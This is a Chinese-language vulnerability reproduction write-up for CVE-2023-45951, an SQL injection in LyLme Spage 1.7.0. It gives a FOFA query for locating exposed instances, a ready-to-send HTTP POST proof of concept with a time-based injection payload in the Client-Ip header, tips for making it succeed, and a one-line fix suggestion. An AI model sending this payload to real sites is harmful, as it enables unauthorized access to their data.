六零导航页SQL注入漏洞复现(CVE-2023-45951)

0x01 产品简介

LyLme Spage(六零导航页)是中国六零(LyLme)开源的一个导航页面。致力于简洁高效无广告的上网导航和搜索入口,支持后台添加链接、自定义搜索引擎,沉淀最具价值链接,全站无商业推广,简约而不简单。

0x02 漏洞概述

LyLme Spage v1.7.0版本存在安全漏洞,该漏洞源于通过function.php的$userip参数发现包含 SQL 注入漏洞,未经授权的攻击者可通过该漏洞获取敏感信息,进一步利用可造成主机失陷。

0x03 影响范围

LyLme Spage 1.7.0

0x04 复现环境

FOFA:title=="上网导航 - LyLme Spage"

0x05 漏洞复现

PoC

复制代码
POST /apply/index.php?submit=post HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Client-Ip: 0'>if(1,sleep(10),2)>'

url=http%3A%2F%2Fbaidu.com&name=test&group_id=1&icon=&authcode=

延时10秒

PS:漏洞存在于 HTTP Header 的 Client-Ip 字段,请求体中url字段值每请求一次就需要更换一次,不然无法成功

0x06 修复建议

在get_real_ip 中检查验证IP合法性,防止SQL注入

相关推荐
P1Browser9 分钟前
指纹浏览器安全吗?从浏览器环境隔离、数据存储到安全风险解析
网络·tcp/ip·安全·网络安全·github·php
KKKlucifer1 小时前
运维域与IT域融合——云网安全一体化运营体系建设
大数据·运维·安全
全栈小51 小时前
【C#】.net core,静态方法线程安全解析,面试时经常被问的线程安全就藏在里面
安全·c#·.netcore
️学习的小王2 小时前
AI编码工具的安全陷阱:Copilot/Codex漏洞风险与防御实践
人工智能·安全·copilot
数据知道2 小时前
PHP 代码审计实战——ThinkPHP、Laravel 历史漏洞模式深度剖析
android·网络·web安全·网络安全·php·laravel
zhonyu鱼2 小时前
Wireshark:开源免费的抓包工具,网络故障排查与安全分析利器
测试工具·安全·wireshark
yuanyuan3342 小时前
装配式危废暂存间怎么挑?防撞、材质、控制、安装四维实测
安全·材质·危废暂存间·危废存储间·危废暂存库·危废堆放间·危废液体储存间
乐迪信息3 小时前
防爆AI摄像机实时监测船舶异常姿态
大数据·人工智能·算法·安全·目标跟踪
7177773 小时前
理性看待AI赋能:软件供应链安全的价值落地与能力边界
人工智能·安全
wbcq_cqg3 小时前
万伯1500方双膜气柜沼气项目案例
经验分享·安全